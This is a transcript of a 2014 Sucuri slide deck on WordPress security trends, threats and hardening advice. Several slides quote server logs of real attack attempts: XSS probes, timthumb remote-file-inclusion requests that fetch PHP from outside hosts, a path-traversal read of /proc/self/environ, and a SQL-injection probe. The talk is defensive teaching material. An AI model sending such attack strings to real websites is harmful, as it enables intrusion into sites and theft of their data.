Website Security (WordPress)
 Sucuri, Inc.
 @sucuri_security
 @perezbox
 Specialization:
 Website Security
 Incident Handling
 Special Interests...
 Website Security Company
 Global Operations
 Platform Agnostic (i.e., Joomla,WordPress, etc..)
 Scan 2M Unique Domain...
 Trends
 Threats
 Defenses
5/17/2014 Tony Perez | @perezbox | @sucuri_security 4
Tony Perez | @perezbox | @sucuri_security5/17/2014 5
5/17/2014 Tony Perez | @perezbox | @sucuri_security 6
Data Breaches (Millions)
2011 2013
Malicious Websites
Legitimate Websites
5/17/2014 Tony Perez | @perezbox | @sucuri_security 7
Not-Exploitable
Exploitable
5/17/2014 Tony Perez | @perezbox | @sucuri_security 8
1 in 8 - CriticalVulnerability
Ransomware
2012 2013
5/17/2014 Tony Perez | @perezbox | @sucuri_security 9
26%
19%
16%
14%
11%
4%
10%
Remote iFrame
Includes
Remote
JavaScript
Includes
SPAM
Injections
Obfuscated /
Encoded
JavaScri...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 11
5/17/2014 Tony Perez | @perezbox | @sucuri_security 12
5/17/2014 Tony Perez | @perezbox | @sucuri_security 13
Darkleech
Cdork
(Apache)
Ebury
(SSH)
Email
Server
(SPAM)
 Going De...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 14
 Pharmacy
 Payday Loans
5/17/2014 Tony Perez | @perezbox | @sucuri_security 16
5/17/2014 Tony Perez | @perezbox | @sucuri_security 17
 ExploitingAccess Control
5/17/2014 Tony Perez | @perezbox | @sucuri_security 18
Site 1
Site 2Site 3
Site 4
Cross-Site Contamination
5/17/2014 Tony Perez | @perezbox | @sucuri_security 19
5/17/2014 Tony Perez | @perezbox | @sucuri_security 20
5/17/2014 Tony Perez | @perezbox | @sucuri_security 21
5/17/2014 Tony Perez | @perezbox | @sucuri_security 22
5/17/2014 Tony Perez | @perezbox | @sucuri_security 23
5/17/2014 Tony Perez | @perezbox | @sucuri_security 24
5/17/2014 Tony Perez | @perezbox | @sucuri_security 25
5/17/2014 Tony Perez | @perezbox | @sucuri_security 26
 Explosion in the Malware
as a Service (MaaS) trade
 Yes, pay someone to hack
for you
 Different tools to break
in and ...
25%
22%
9%
1%
11%
5%
12%
10%
5% Neutrino
Unknown Kit
Redkit
SweetOrange
Styx
Glazunov/Sibhost
Nuclear
Blackhole/Cool
Other...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 29
5/17/2014 Tony Perez | @perezbox | @sucuri_security 30
5/17/2014 Tony Perez | @perezbox | @sucuri_security 31
 Use for malware?
 Burrow into network?
 Steal data?
What kind o...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 32
5/17/2014 Tony Perez | @perezbox | @sucuri_security 33
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 34
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffecti...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 36
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999....
5/17/2014 Tony Perez | @perezbox | @sucuri_security 37
5/17/2014 Tony Perez | @perezbox | @sucuri_security 38
 http://blog.sucuri.net/2014/03/unmasking-free-premium-
wordpress-plugins.html
5/17/2014 Tony Perez | @perezbox | @sucuri...
 Brand Reputation
 Legal Implications
 Impact to Sales
 Blacklisted by Search
Engines
 Blacklisted by Payment
process...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 41
 Sucuri properties
suffer:
 ~125,000 web based
attacks a month on
average
 ~4,000 attacks a day
▪ This spikes on occasi...
 Principles
 Access Control
 Vulnerabilities
5/17/2014 Tony Perez | @perezbox | @sucuri_security 43
“It’s about risk reduction… risk will never be
zero…”
5/17/2014 Tony Perez | @perezbox | @sucuri_security 44
“…a concept in which multiple layers of security
controls (defenses) are placed throughout an
information technology (IT) ...
 Passwords
5/17/2014 Tony Perez | @perezbox | @sucuri_security 46
Complex – Long - Unique
5/17/2014 Tony Perez | @perezbox | @sucuri_security 47
5/17/2014 Tony Perez | @perezbox | @sucuri_security 48
5/17/2014 Tony Perez | @perezbox | @sucuri_security 49
• https://getclef.com/ | @getclef
“requires that in a particular abstraction layer
of a computing environment, every module
(such as a process, a user or a ...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 51
 PHP Execution, disable it:
 /wp-includes
 /wp-content
 /themes...
 WP-CONFIG File Modification
#Disable Plugin /Theme Editor
Define(‘DISALLOW_FILE_EDIT’,true);
5/17/2014 Tony Perez | @per...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 53
• https://www.getcloak.com/ | @getcloak
5/17/2014 Tony Perez | @perezbox | @sucuri_security 54
5/17/2014 Tony Perez | @perezbox | @sucuri_security 55
NOTTHAT HARD!!!!
 Stay current with the latest vulnerabilities:
 Secure - http://wordpress.org/plugins/secure/
5/17/2014 Tony Perez | @pe...
 Local Protection
 https://bruteprotect.com/ | @BruteProtect
5/17/2014 Tony Perez | @perezbox | @sucuri_security 57
5/17/2014 Tony Perez | @perezbox | @sucuri_security 58
• Stay ahead of SoftwareVulnerabilities
5/17/2014 Tony Perez | @perezbox | @sucuri_security 59
5/17/2014 Tony Perez | @perezbox | @sucuri_security 60
1. Employ Website Firewall
2. Don’t let WordPress write to
itself
3...
1. Fix index.php file and assume all is fine.
1. Panic your way into WordPress Forums after hack.
1. Don’t worry about upd...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 62
Name Tool
Sucuri Blog http://blog.sucuri.net
SucuriTV http://sucuri...
5/17/2014 Tony Perez | @perezbox | @sucuri_security 63
Sucuri, Inc.
Tony Perez
http://sucuri.net
http://blog.sucuri.net
@p...
Upcoming SlideShare
Loading in...5
×

Website Security - Latest and Greatest (WordPress 2014)

979

Published on

This presentation focuses on three elements - Trends, Threats and Defenses. It leverages the latests data from some of the top Information Security companies out there (i.e., Symantec, Websense, etc..). It does not go over the typical 10 things, instead it focuses on broad Information Security concepts and principles that many website owners don't account for.

0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
979
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
31
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide

Website Security - Latest and Greatest (WordPress 2014)

  1. 1. Website Security (WordPress)
  2. 2.  Sucuri, Inc.  @sucuri_security  @perezbox  Specialization:  Website Security  Incident Handling  Special Interests:  Brazilian JiuJitsu Tony Perez | @perezbox | @sucuri_security5/17/2014 2
  3. 3.  Website Security Company  Global Operations  Platform Agnostic (i.e., Joomla,WordPress, etc..)  Scan 2M Unique Domains a Month  Block 4M web attacks a Month  Remediate 400 – 500 websites a day  Signature / Heuristic Based  24/7 operations 5/17/2014 Tony Perez | @perezbox | @sucuri_security 3
  4. 4.  Trends  Threats  Defenses 5/17/2014 Tony Perez | @perezbox | @sucuri_security 4
  5. 5. Tony Perez | @perezbox | @sucuri_security5/17/2014 5
  6. 6. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 6 Data Breaches (Millions) 2011 2013
  7. 7. Malicious Websites Legitimate Websites 5/17/2014 Tony Perez | @perezbox | @sucuri_security 7
  8. 8. Not-Exploitable Exploitable 5/17/2014 Tony Perez | @perezbox | @sucuri_security 8 1 in 8 - CriticalVulnerability
  9. 9. Ransomware 2012 2013 5/17/2014 Tony Perez | @perezbox | @sucuri_security 9
  10. 10. 26% 19% 16% 14% 11% 4% 10% Remote iFrame Includes Remote JavaScript Includes SPAM Injections Obfuscated / Encoded JavaScript Conditional Redirects Defacements Other 5/17/2014 Tony Perez | @perezbox | @sucuri_security 10
  11. 11. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 11
  12. 12. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 12
  13. 13. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 13 Darkleech Cdork (Apache) Ebury (SSH) Email Server (SPAM)  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a highly adaptive / sophistication Heartbleed (OpenSSL)
  14. 14. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 14
  15. 15.  Pharmacy  Payday Loans 5/17/2014 Tony Perez | @perezbox | @sucuri_security 16
  16. 16. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 17  ExploitingAccess Control
  17. 17. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4 Cross-Site Contamination
  18. 18. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 19
  19. 19. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 20
  20. 20. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 21
  21. 21. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 22
  22. 22. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 23
  23. 23. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 24
  24. 24. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 25
  25. 25. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 26
  26. 26.  Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole ExploitAuthor Arrested 5/17/2014 Tony Perez | @perezbox | @sucuri_security 27
  27. 27. 25% 22% 9% 1% 11% 5% 12% 10% 5% Neutrino Unknown Kit Redkit SweetOrange Styx Glazunov/Sibhost Nuclear Blackhole/Cool Other 5/17/2014 Tony Perez | @perezbox | @sucuri_security 28
  28. 28. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 29
  29. 29. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 30
  30. 30. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 31  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
  31. 31. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 32
  32. 32. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 33 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
  33. 33. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 34
  34. 34. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 5/17/2014 Tony Perez | @perezbox | @sucuri_security 35
  35. 35. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 36 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
  36. 36. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 37
  37. 37. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 38
  38. 38.  http://blog.sucuri.net/2014/03/unmasking-free-premium- wordpress-plugins.html 5/17/2014 Tony Perez | @perezbox | @sucuri_security 39 - SEOPresser - Payload located: wp-content/plugins/seo-pressor(gratuit) - File: central.class.php - Flat Skins Pack Extension - Payload located: wp-content/restrict-content-pro/includes/ - File: sidebar.php - Restrict Content Pro - Paylaod located: wp-content/ubermenu-skins-flat
  39. 39.  Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 5/17/2014 Tony Perez | @perezbox | @sucuri_security 40
  40. 40. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 41
  41. 41.  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 5/17/2014 Tony Perez | @perezbox | @sucuri_security 42
  42. 42.  Principles  Access Control  Vulnerabilities 5/17/2014 Tony Perez | @perezbox | @sucuri_security 43
  43. 43. “It’s about risk reduction… risk will never be zero…” 5/17/2014 Tony Perez | @perezbox | @sucuri_security 44
  44. 44. “…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…” 5/17/2014 Tony Perez | @perezbox | @sucuri_security 45
  45. 45.  Passwords 5/17/2014 Tony Perez | @perezbox | @sucuri_security 46 Complex – Long - Unique
  46. 46. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 47
  47. 47. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 48
  48. 48. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 49 • https://getclef.com/ | @getclef
  49. 49. “requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.” 5/17/2014 Tony Perez | @perezbox | @sucuri_security 50
  50. 50. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 51  PHP Execution, disable it:  /wp-includes  /wp-content  /themes  /plugins  /uploads <Files *.php> Deny from all </Files>
  51. 51.  WP-CONFIG File Modification #Disable Plugin /Theme Editor Define(‘DISALLOW_FILE_EDIT’,true); 5/17/2014 Tony Perez | @perezbox | @sucuri_security 52
  52. 52. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 53 • https://www.getcloak.com/ | @getcloak
  53. 53. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 54
  54. 54. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 55 NOTTHAT HARD!!!!
  55. 55.  Stay current with the latest vulnerabilities:  Secure - http://wordpress.org/plugins/secure/ 5/17/2014 Tony Perez | @perezbox | @sucuri_security 56
  56. 56.  Local Protection  https://bruteprotect.com/ | @BruteProtect 5/17/2014 Tony Perez | @perezbox | @sucuri_security 57
  57. 57. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 58 • Stay ahead of SoftwareVulnerabilities
  58. 58. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 59
  59. 59. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 60 1. Employ Website Firewall 2. Don’t let WordPress write to itself 3. Filter Access by IP 4. Use a dedicated server / VPS 5. Monitor all Activity (Logging) 6. Enable SSL for transactions 7. Keep environment current (patched) 8. No Soup Kitchen Servers Ideal implementations: 1. Connect Securely – SFTP / SSH 2. Authentication Keys / wp- config 3. Use Trusted Sources 4. Use a local Antivirus – MAC too 5. Permissions - D 755 | F 644 6. Least Privileged Principles 7. Accountability 8. Backups – Include Database The Bare Minimum:
  60. 60. 1. Fix index.php file and assume all is fine. 1. Panic your way into WordPress Forums after hack. 1. Don’t worry about updating. 1. Trust third-party extensions. 1. Apply all upgrades on live site. 1. Install and forget, all is well with your new site. 1. Use the same username and password for everything. 1. Don’t waste time making security adjustments to PHP and settings. 1. No regular backups required. 1. Use the cheapest host. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 61
  61. 61. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 62 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv Malware Scanner http://sitecheck.sucuri.net Malware Scanner http://unmaskparasites.com Badware Busters https://badwarebusters.org Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked WordPress Hardening http://codex.wordpress.org/Hardening_WordPress
  62. 62. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 63 Sucuri, Inc. Tony Perez http://sucuri.net http://blog.sucuri.net @perezbox | @sucuri_security Slides: http://www.slideshare.net/perezbox/website-security-its- about-the-basics-wordpress-2014
  1. Gostou de algum slide específico?

    Recortar slides é uma maneira fácil de colecionar informações para acessar mais tarde.

×